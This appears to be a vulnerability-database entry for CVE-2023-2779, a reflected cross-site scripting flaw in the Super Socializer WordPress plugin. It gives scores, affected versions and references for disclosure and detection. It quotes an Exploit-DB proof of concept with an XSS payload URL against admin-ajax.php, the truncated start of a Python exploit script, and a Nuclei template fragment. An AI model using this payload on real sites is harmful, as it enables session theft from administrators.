CVE-2023-2779
Published 2023-06-19
Priority: P3 38 · Severity: medium · CVSS 3.1 base score: 6.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
EPSS: 5.99% (92.4th percentile)
The Social Share, Social Login and Social Comments WordPress plugin before 7.13.52 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| heator | social_share_social_login_and_social_comments | < 7.13.52 | 7.13.52 |
No detection rules found.
Exploit-DB
Super Socializer 7.13.52 - Reflected XSS
exploitdb · 2023-06-20 · CVSS 6.1 · CVE-2023-2779 [MEDIUM]
---
# Exploit Title: Super Socializer 7.13.52 - Reflected XSS
# Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com
# Date: 2023-06-20
# Exploit Author: Amirhossein Bahramizadeh
# Category : Webapps
# Vendor Homepage: https://wordpress.org/plugins/super-socializer
# Version: 7.13.52 (REQUIRED)
# Tested on: Windows/Linux
# CVE : CVE-2023-2779
import requests
# The URL of the vulnerable AJAX endpoint
url = "https://example.com/wp-admin/admin-ajax.php"
# The vulnerable parameter that is not properly sanitized and escaped
vulnerable_param = ""
# The payload that exploits the vulnerability
payload = {"action": "the_champ_shar
Nuclei
Super Socializer < 7.13.52 - Cross-Site Scripting
nuclei · CVSS 6.1 · CVE-2023-2779 [MEDIUM]
Super Socializer ") && contains(body_2, "facebook_urls")'
condition: and
# digest: 4a0a0047304502202f3ab2ca4d7c92582bc1826875f03446a62aaab1789dfba06f11bb811e0a78d5022100d8e15cac1352ff21eb26673d594738d27f3334d12df784771f3a37935ffaa749:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
References
http://packetstormsecurity.com/files/173053/WordPress-Super-Socializer-7.13.52-Cross-Site-Scripting.html
https://wpscan.com/vulnerability/fe9b7696-3b0e-42e2-9dbc-55167605f5c5